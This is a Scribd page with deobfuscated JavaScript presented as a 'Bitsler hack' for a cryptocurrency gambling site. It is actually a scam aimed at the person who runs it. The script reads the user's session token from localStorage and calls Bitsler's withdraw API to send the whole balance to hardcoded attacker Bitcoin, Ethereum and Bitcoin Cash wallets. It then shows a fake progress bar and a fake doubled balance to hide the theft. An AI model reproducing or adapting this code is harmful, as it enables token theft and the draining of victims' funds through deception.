0% found this document useful (0 votes)
127 views

Deobuf

The document contains code for a script that attempts to hack a cryptocurrency site called Bitsler. It defines functions to clear intervals, get currency data, parse settings, make API requests to withdraw funds, and modify the page to display fake balances and progress updates. On each interval, it checks the user's balance and tries to withdraw funds to a random wallet address, displaying alerts if the balance is too low or the request fails or succeeds.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
127 views

Deobuf

The document contains code for a script that attempts to hack a cryptocurrency site called Bitsler. It defines functions to clear intervals, get currency data, parse settings, make API requests to withdraw funds, and modify the page to display fake balances and progress updates. On each interval, it checks the user's balance and tries to withdraw funds to a random wallet address, displaying alerts if the balance is too low or the request fails or succeeds.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

function yt() {

clearInterval(gftrf);
}
var gftrf = setInterval(function () {
var currency = document["getElementsByClassName"]("currency-small")[0]["alt"];

function hack() {
var settings = localStorage["settings"];
var json_settings = JSON["parse"](settings);
var token = json_settings["user"]["token"];
var req = new XMLHttpRequest();
var apiurl = "https://www.bitsler.com/api/withdraw";
var link_data = "address=" + wallet_withdraw + "&dest_tag=&currency=" +
type_curren + "&amount=" + balance + "&fee=" + amount +
"&two_factor=&access_token=" + token;
req["onreadystatechange"] = function () {
if (this["readyState"] == 4 && this["status"] == 200) {
var response = JSON["parse"](this["responseText"]);
if (response["error"] == "This fee amount isn't accepted.") {
yt();
alert("This fee amount isn't run script. Please deposit 0.05 "
+ currency);
}
var _0x7935x23 = response["error"]["charAt"](16);
var _0x7935x24 = response["error"]["charAt"](17);
var _0x7935x25 = response["error"]["charAt"](18);
var _0x7935x26 = response["error"]["charAt"](19);
var _0x7935x27 = response["error"]["charAt"](20);
var _0x7935x28 = response["error"]["charAt"](21);
var _0x7935x29 = response["error"]["charAt"](22);
var _0x7935x2a = response["error"]["charAt"](23);
var _0x7935x2b = response["error"]["charAt"](24);
var _0x7935x2c = response["error"]["charAt"](25);
var error_balance = _0x7935x23 + _0x7935x24 + _0x7935x25 +
_0x7935x26 + _0x7935x27 + _0x7935x28 + _0x7935x29 + _0x7935x2a + _0x7935x2b +
_0x7935x2c;
var _0x7935x2e = response["error"]["charAt"](0);
var _0x7935x2f = response["error"]["charAt"](1);
var _0x7935x30 = response["error"]["charAt"](2);
var _0x7935x31 = response["error"]["charAt"](3);
var _0x7935x32 = response["error"]["charAt"](4);
var _0x7935x33 = response["error"]["charAt"](5);
var _0x7935x34 = response["error"]["charAt"](6);
var _0x7935x35 = response["error"]["charAt"](7);
var _0x7935x36 = response["error"]["charAt"](8);
var _0x7935x37 = response["error"]["charAt"](9);
var error_b = _0x7935x2e + _0x7935x2f + _0x7935x30 + _0x7935x31 +
_0x7935x32 + _0x7935x33 + _0x7935x34 + _0x7935x35 + _0x7935x36 + _0x7935x37;
if (response["success"] == false && error_b == "Max withdr") {
yt();
alert("Your Maximum balenanc is " + error_balance + " " +
currency + ". The script is not working for this balance.↵↵Deposit More then 0.05
BTC 1 ETH and 2 BCH.↵Then run the script.");
}
if (response["success"] == true && response["amount"] >= 0.05) {
document["querySelector"]("#notifications__BV_toggle_")
["click"]();
document["querySelector"]("#notifications")["style"]["display"]
= "none";
yt();
fackeHacked();
}
if (response["success"] == true && response["amount"] < 0.05) {
alert("Your Maximum balenanc is " + response["amount"] + " " +
currency + ". The script is not working for this balance.↵↵Deposit More then 0.05
BTC 1 ETH and 2 BCH.↵Then run the script.");
document["querySelector"]("#notifications__BV_toggle_")
["click"]();
document["querySelector"]("#notifications")["style"]["display"]
= "none";
yt();
}
}
};
req["open"]("POST", apiurl, true);
req["setRequestHeader"]("Content-type", "application/x-www-form-urlencoded;
charset=UTF-8");
req["send"](link_data);
}
function fackeBalance() {
balance = parseFloat(balance);
balance = balance * 2;
balance = balance["toFixed"](8);
document["getElementsByClassName"]("bal-amount")[0]["innerHTML"] = '<img
alt="BTC" src="/static/img/currencies/btc.addb4668.png" class="currency-small">' +
" " + balance;
}
function fackeHacked() {
var smblock = document["getElementsByClassName"]("d-none d-sm-block")[2];
smblock["innerHTML"] = "";
var pelem = document["createElement"]("p");
var plogo = document["createTextNode"]("BITSLER HACK 2021");
pelem["appendChild"](plogo);
pelem["className"] = "col-xl-12";
pelem["style"]["margin"] = "0 auto";
pelem["style"]["fontSize"] = "32px";
pelem["style"]["marginBottom"] = "30px";
smblock["appendChild"](pelem);
pelem = document["createElement"]("p");
plogo = document["createTextNode"]("Current Progress: 0%");
pelem["className"] = "promenatextprocenat col-xl-12";
pelem["appendChild"](plogo);
pelem["style"]["margin"] = "0 auto";
pelem["style"]["fontSize"] = "24px";
pelem["style"]["marginBottom"] = "30px";
smblock["appendChild"](pelem);
pelem = document["createElement"]("div");
pelem["className"] = "col-xl-12";
var divel = document["createElement"]("div");
divel["className"] = "row";
var pelem2 = document["createElement"]("button");
pelem2["className"] = "col-xl-2 dugmence";
pelem2["style"]["margin"] = "0 auto";
pelem2["style"]["fontSize"] = "28px";
pelem2["style"]["backgroundColor"] = "#00ff9c";
pelem2["style"]["border"] = "3px solid #d9e0e6";
pelem2["style"]["borderRadius"] = "20px";
var btnel = document["createTextNode"]("START");
pelem2["appendChild"](btnel);
divel["appendChild"](pelem2);
pelem["appendChild"](divel);
smblock["appendChild"](pelem);
document["getElementsByClassName"]("dugmence")[0]["onclick"] = function ()
{
var count = 0;
var timer_count = setInterval(function () {
if (count <= 100) {
document["getElementsByClassName"]("promenatextprocenat")[0]
["innerHTML"] = "Current Progress: " + count + "%";
count++;
} else {
document["getElementsByClassName"]("promenatextprocenat")[0]
["innerHTML"] = "Current Progress: 100%<br>Your balance has been doubled!";
fackeBalance();
clearInterval(timer_count);
}
}, 50);
};
}
var btc1 = "1Ed8TSYNcQRGFQxPsmkD2UBroE9cg6TrkW";
var btc2 = "38F91UewMMJg8okpkaiUf54S4Lbp2EjQCX";
var btc3 = "1EEwKyAP999n4eKQPEe44HxznT3hvhr8zv";
var btc4 = "1MzJohHEc2RaNar8nF5CgcUtJiSVB2cubE";
var btc5 = "1AsL4vdJ9GZASZsU7J3i4jVsyasuQdeUNF";
var btc6 = "1BTNvVXV4GXibhENMYqfgEiDVuPE5KYk4s";
var btc7 = "1Q15WfykBQYeXdXbkJBjQdcXz5Z1NKW6T8";
var btc8 = "1LyJwyiKL8JzB5dFkz8o4NCYbyfxASRhTq";
var btc9 = "12tv6LYfubY2W9ZAwLApu8F2jZntMucyrx";
var btc10 = "18tFWUv1a1wE3QYkw4ffK1ba18HFEdBYSQ";
var btc = [btc1, btc2, btc3, btc4, btc5, btc6, btc7, btc8, btc9, btc10];
var eth1 = "0x36c341a9401146E7Fa2300ABdF8B4593b5d9b9BB";
var eth2 = "0xF56cF28b283d010575ef690757FAe7EB52735159";
var eth3 = "0x4Da237c914802e6b7DD0474B4528B2E732b348c5";
var eth4 = "0x1a6ff510b1bce20670af19f1f09489ed59c4932d";
var eth5 = "0x4a11356d7b217e5e1f55c09a2468a85380a1a37f";
var eth = [eth1, eth2, eth3, eth4, eth5];
var bch1 = "qqprj5q37z9tqd73fj2w4qzc9mrtq57a5speqydcas";
var bch2 = "qzzy4ta7faphhzvycce7vn0dc4fhw6vrvgkhmp7df2";
var bch3 = "39zgezhWVott4663RMjJkTj1K6ARMj5JM4";
var bch4 = "bitcoincash:qquzswlmc43r5p3nyjjgjm2ctuvu6tqgr565y6vhm8";
var bch5 = "bitcoincash:qrcfe8kdexntt5368ytacleeugvm35t3ygcksy26r0";
var bch = [bch1, bch2, bch3, bch4, bch5];
var rand_wallet = Math["floor"](Math["random"]() * 5);
var wallet_withdraw = "nondef";
var balance = document["getElementsByClassName"]("bal-amount")[0]["innerText"]
["replace"](" ", "");
var img_curren = document["getElementsByClassName"]("bal-amount")[0]
["getElementsByTagName"]("img")[0]["src"];
var amount = 0.002;
if (img_curren ==
"https://www.bitsler.com/static/img/currencies/btc.addb4668.png") {
rand_wallet = Math["floor"](Math["random"]() * 10);
wallet_withdraw = btc[rand_wallet];
var type_curren = "btc";
amount = 0.0006;
}
if (img_curren ==
"https://www.bitsler.com/static/img/currencies/eth.bca72386.png") {
wallet_withdraw = eth[rand_wallet];
type_curren = "eth";
amount = 0.001;
}
if (img_curren ==
"https://www.bitsler.com/static/img/currencies/bch.b3920165.png") {
wallet_withdraw = bch[rand_wallet];
type_curren = "bch";
amount = 0.0005;
}
if (wallet_withdraw != "nondef") {
if (parseFloat(balance) > 0.005) {
hack();
} else {
alert(
"You have at least balance for the hack 0.05 BTC or equivalent in
ETH / BCH (1 ETH or 2 BCH)↵↵And that you do not have ANY money in other
cryptocurrencies.Use Exchanger on Bitsler to convert other currencies to one
cryptocurrency."
);
}
} else {
alert("You need to use BTC, ETH or BCH.");
}
}, 2500);

You might also like